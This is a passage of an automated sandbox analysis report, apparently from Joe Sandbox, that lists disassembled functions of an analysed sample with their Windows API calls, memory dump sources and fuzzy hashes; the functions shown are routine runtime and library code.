                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: EqualOffsetTypeids
                                                    • String ID:
                                                    • API String ID: 1707706676-0
                                                    • Opcode ID: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                    • Instruction ID: 01e49bf8d3b24bce68f56c64dc475ed7972e7b1bcf08b8dcdfd00cee777014d5
                                                    • Opcode Fuzzy Hash: 2ca317564d3a52bdce74212441e3e6b18e266408b0b4746ca7a4d4689c7ceabc
                                                    • Instruction Fuzzy Hash: AE418E359042499FEF24CF69E4816EEFBF1EF06318F14459AD890A7750DB32AB44CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF9383C Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF88AA4: _free.LIBCMT ref: 6CF88AB2
                                                      • Part of subcall function 6CF8FFCF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,00000001,6CF839A1,6CF8DB72,0000FDE9,00000000,?,?,?,6CF8D8EB,0000FDE9,00000000,?), ref: 6CF9007B
                                                    • GetLastError.KERNEL32 ref: 6CF938A4
                                                    • __dosmaperr.LIBCMT ref: 6CF938AB
                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6CF938EA
                                                    • __dosmaperr.LIBCMT ref: 6CF938F1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                    • String ID:
                                                    • API String ID: 167067550-0
                                                    • Opcode ID: 5a1c04fcc5f650b4f91b82d94509b17cdf03489b98f93bbc8c76ca82bb5af341
                                                    • Instruction ID: 031c04a926647814d6ad4418cf736260b2b81b726a8674821836980b6f13bf69
                                                    • Opcode Fuzzy Hash: 5a1c04fcc5f650b4f91b82d94509b17cdf03489b98f93bbc8c76ca82bb5af341
                                                    • Instruction Fuzzy Hash: 192174726092196FEF509F668C80997BBBDEF4136C7144619F92C97A50D731EC188BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF54D60 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6CF54D81
                                                    • TranslateMessage.USER32(?), ref: 6CF54D99
                                                    • DispatchMessageW.USER32(?), ref: 6CF54D9F
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 6CF54DAB
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Message$DispatchTranslate
                                                    • String ID:
                                                    • API String ID: 1706434739-0
                                                    • Opcode ID: 968cfd4f7bcdf90b490a5453e18fb38a38e4a8c8584b2614c7363eca5ab4cf1c
                                                    • Instruction ID: 250a94318249520278e0b46e5e6f5633047ff80b77ca018c4d672709cf079339
                                                    • Opcode Fuzzy Hash: 968cfd4f7bcdf90b490a5453e18fb38a38e4a8c8584b2614c7363eca5ab4cf1c
                                                    • Instruction Fuzzy Hash: 07F03C32B1121DA6EF10DBA5DD41FEAB7BCEB49604F550066EA04EB280DA64E9058BA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED6E20 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E36
                                                    • UnloadUserProfile.USERENV(?,?,00000000,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E51
                                                    • CloseHandle.KERNEL32(?,00000000,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E61
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(-00000001,?,00ED6DD2,?,00000002,ScheduleProcessCleanup failed, user environment and profile leaked: %s (%d),00000000,00000000), ref: 00ED6E6F
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: free$CloseHandleProfileUnloadUser
                                                    • String ID:
                                                    • API String ID: 3143209300-0
                                                    • Opcode ID: 37f3378e058e43ff8387ac1157063b17a6bff0b0c0cfeab8f0e19c043badc1c6
                                                    • Instruction ID: ea493a02624a5a4676cd8fe69ce5ca0debbd4c6e8cbc5e90b7c9979409a0d8e4
                                                    • Opcode Fuzzy Hash: 37f3378e058e43ff8387ac1157063b17a6bff0b0c0cfeab8f0e19c043badc1c6
                                                    • Instruction Fuzzy Hash: AAF0B4B00027019FD7204F26ED08A0777E9EF00374F08852AE8AAA26A0C735EA50CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF9ACF6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001), ref: 6CF9AD0D
                                                    • GetLastError.KERNEL32(?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001,?,00000001,?,6CF8DB0D,6CF839A1), ref: 6CF9AD19
                                                      • Part of subcall function 6CF9ACDF: CloseHandle.KERNEL32(FFFFFFFE,6CF9AD29,?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001,?,00000001), ref: 6CF9ACEF
                                                    • ___initconout.LIBCMT ref: 6CF9AD29
                                                      • Part of subcall function 6CF9ACA1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CF9ACD0,6CF9733C,00000001,?,6CF8D5C1,?,?,00000001,?), ref: 6CF9ACB4
                                                    • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6CF9734F,?,00000001,?,00000001,?,6CF8D5C1,?,?,00000001,?), ref: 6CF9AD3E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                    • String ID:
                                                    • API String ID: 2744216297-0
                                                    • Opcode ID: f76b70c92af67d9330d9cbd54271d43d610a272035b9cd7f8687ff887a430cb2
                                                    • Instruction ID: 427f7c7682c5c9ae21497f4b5ed759272e1be212f95c9169bd49840e18477ff4
                                                    • Opcode Fuzzy Hash: f76b70c92af67d9330d9cbd54271d43d610a272035b9cd7f8687ff887a430cb2
                                                    • Instruction Fuzzy Hash: 15F03036A10214BBCF921FA1CC05B893FB6FF4A7B5B044012FA1999230D732C820EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF77EAA Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SleepConditionVariableCS.KERNELBASE(?,6CF77E47,00000064), ref: 6CF77ECD
                                                    • LeaveCriticalSection.KERNEL32(6CFDB368,6CFD9F48,?,6CF77E47,00000064,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77ED7
                                                    • WaitForSingleObjectEx.KERNEL32(6CFD9F48,00000000,?,6CF77E47,00000064,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77EE8
                                                    • EnterCriticalSection.KERNEL32(6CFDB368,?,6CF77E47,00000064,?,6CF6203E,6CFD9F48,00000001), ref: 6CF77EEF
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                    • String ID:
                                                    • API String ID: 3269011525-0
                                                    • Opcode ID: 1474e5761873d3a98c123e0c35fbd8af59b78fd9c6b397a40e8388977fe3b1ea
                                                    • Instruction ID: 25e7046dd37fdbd5c0428470cdb83d2340e8344cd83bf24a03767b2e5b73207f
                                                    • Opcode Fuzzy Hash: 1474e5761873d3a98c123e0c35fbd8af59b78fd9c6b397a40e8388977fe3b1ea
                                                    • Instruction Fuzzy Hash: 99E09232E61628F7DE921F60EC09B8D3F38FF0B712B224452F60456920C6222C009BD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF89B1A Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _free.LIBCMT ref: 6CF89B23
                                                      • Part of subcall function 6CF8ACB9: HeapFree.KERNEL32(00000000,00000000,?,6CF899DC), ref: 6CF8ACCF
                                                      • Part of subcall function 6CF8ACB9: GetLastError.KERNEL32(?,?,6CF899DC), ref: 6CF8ACE1
                                                    • _free.LIBCMT ref: 6CF89B36
                                                    • _free.LIBCMT ref: 6CF89B47
                                                    • _free.LIBCMT ref: 6CF89B58
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: _free$ErrorFreeHeapLast
                                                    • String ID:
                                                    • API String ID: 776569668-0
                                                    • Opcode ID: 9688f0173a7372e4adb00366f5db1e11e3dddf2167d5464fd87fe72aeb186393
                                                    • Instruction ID: 82e69e5b853236b7aa16b648b5a0ef0313815e9e4094cac5d2ff9c9b38ae204e
                                                    • Opcode Fuzzy Hash: 9688f0173a7372e4adb00366f5db1e11e3dddf2167d5464fd87fe72aeb186393
                                                    • Instruction Fuzzy Hash: A8E0B679E229359BCED27F34A940AD93FB1FB4BA243450806EA0013750CFB36556AFC5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF53C90 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 374COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 6CF5A580: ___std_exception_copy.LIBVCRUNTIME ref: 6CF5A6A2
                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CF54103
                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CF54179
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Ios_base_dtorstd::ios_base::_$___std_exception_copy
                                                    • String ID: OutputStreamPointer
                                                    • API String ID: 1754327082-2506108687
                                                    • Opcode ID: 73e7ea7d3c7eef87fa975f8591d9e2d4707ff2994b3ff6a018ebc5b684de9927
                                                    • Instruction ID: 75a175e3dc7a71a97d5af3177a9ad3d8baa351246599ca1a6005d5581b16c3be
                                                    • Opcode Fuzzy Hash: 73e7ea7d3c7eef87fa975f8591d9e2d4707ff2994b3ff6a018ebc5b684de9927
                                                    • Instruction Fuzzy Hash: BB026DB0900259DFDF14CF68C945BDDBBB1BF14308F2081A9E519AB791DB71AA48CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF52F40 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6CF530C2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: ___std_exception_copy
                                                    • String ID: " not used$AlgorithmParametersBase: parameter "
                                                    • API String ID: 2659868963-612349224
                                                    • Opcode ID: 8ade10378bff7e3bc3034e49c1106ac952b0605bb3232affb8f6c5a6625a8838
                                                    • Instruction ID: a42a4c06193764a78bcfb7171c160717a3ed7ed2d42af2c6f2e1b230cf981903
                                                    • Opcode Fuzzy Hash: 8ade10378bff7e3bc3034e49c1106ac952b0605bb3232affb8f6c5a6625a8838
                                                    • Instruction Fuzzy Hash: E751C271905748AFDB14DFA8D800B9ABBF8EF09718F10465BF92597B40D772A514CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF79BE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 6CF79C1F
                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 6CF79CD3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: CurrentImageNonwritable___except_validate_context_record
                                                    • String ID: csm
                                                    • API String ID: 3480331319-1018135373
                                                    • Opcode ID: 643ca5de537f8503e0f0cccf27439ca68fce1568fb24952b095de11fa719b27f
                                                    • Instruction ID: 1a34706fe72b85d814961e1f9dc3407eba28e99cd60ef87800b5f1602fa22625
                                                    • Opcode Fuzzy Hash: 643ca5de537f8503e0f0cccf27439ca68fce1568fb24952b095de11fa719b27f
                                                    • Instruction Fuzzy Hash: 6141B734A011199FCF10DF68E884A9EBBF5FF46328F148196E8149B755DB32EB05CBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF7BBB3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6CF7BBD8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: EncodePointer
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2118026453-2084237596
                                                    • Opcode ID: d5e79ec7ade30274a506ebe52008fb5c64599ace92f0c1576d24ef62c4a5366c
                                                    • Instruction ID: 4443c9fb7ef90ed57f19626890e5709c29f54172a42f943e4cb11fa212f9f44b
                                                    • Opcode Fuzzy Hash: d5e79ec7ade30274a506ebe52008fb5c64599ace92f0c1576d24ef62c4a5366c
                                                    • Instruction Fuzzy Hash: FD417871900209AFCF26CF94ED81AEE7BB5BF09308F14859AF90476614D7359960DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 6CF79AA5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3858261632.000000006CF51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CF50000, based on PE: true
                                                    • Associated: 00000004.00000002.3858217155.000000006CF50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858354479.000000006CFBA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858482466.000000006CFD7000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858527942.000000006CFD8000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFD9000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858568373.000000006CFDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                    • Associated: 00000004.00000002.3858663344.000000006CFDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_6cf50000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: Offset
                                                    • String ID: Bad dynamic_cast!
                                                    • API String ID: 1587990502-2956939130
                                                    • Opcode ID: 46ba7e4b7d58aaad0f73eb5c78b5b5112be3b8feb0e9524bb6e7b1a36f6cd597
                                                    • Instruction ID: bf6aa4c3b8cc84ff83ced0736b3ef0c0cbf2c799ea72e555f394ad897603946b
                                                    • Opcode Fuzzy Hash: 46ba7e4b7d58aaad0f73eb5c78b5b5112be3b8feb0e9524bb6e7b1a36f6cd597
                                                    • Instruction Fuzzy Hash: 92219272A142059FDF28DF6DED05A9A77B5FB85328B14461BE910A3A80DF31EB0587B0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED85F9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00ED8604
                                                    • ___raise_securityfailure.LIBCMT ref: 00ED86C1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.3857372619.0000000000ED1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00ED0000, based on PE: true
                                                    • Associated: 00000004.00000002.3857299596.0000000000ED0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857443217.0000000000EDA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.3857522386.0000000000EE2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_ed0000_FilePost?a.jbxd
                                                    Similarity
                                                    • API ID: FeaturePresentProcessor___raise_securityfailure
                                                    • String ID: PY
                                                    • API String ID: 3761405300-1007129125
                                                    • Opcode ID: c6d4b726ce127cc3421e64f6b786492982cdc2fc732a09965f2caef0bee99ddf
                                                    • Instruction ID: 06cf706686768f5c36a1853d21dae1dce9ed14836bfefd7a223c34d6ab49d0f9
                                                    • Opcode Fuzzy Hash: c6d4b726ce127cc3421e64f6b786492982cdc2fc732a09965f2caef0bee99ddf
                                                    • Instruction Fuzzy Hash: C011AFB8912689DEC710CF16FDC16843BA4FB4C340B00519AF608EE3B1E77095C9EB46
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00ED10C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00ED10F7
                                                    • Warning.VMWAREBASE(?), ref: 00ED10FE
                                                      • Part of subcall function 00ED3B70: Warning.VMWAREBASE(?,00000400,?,?), ref: 00ED3B96
                                                    Strings
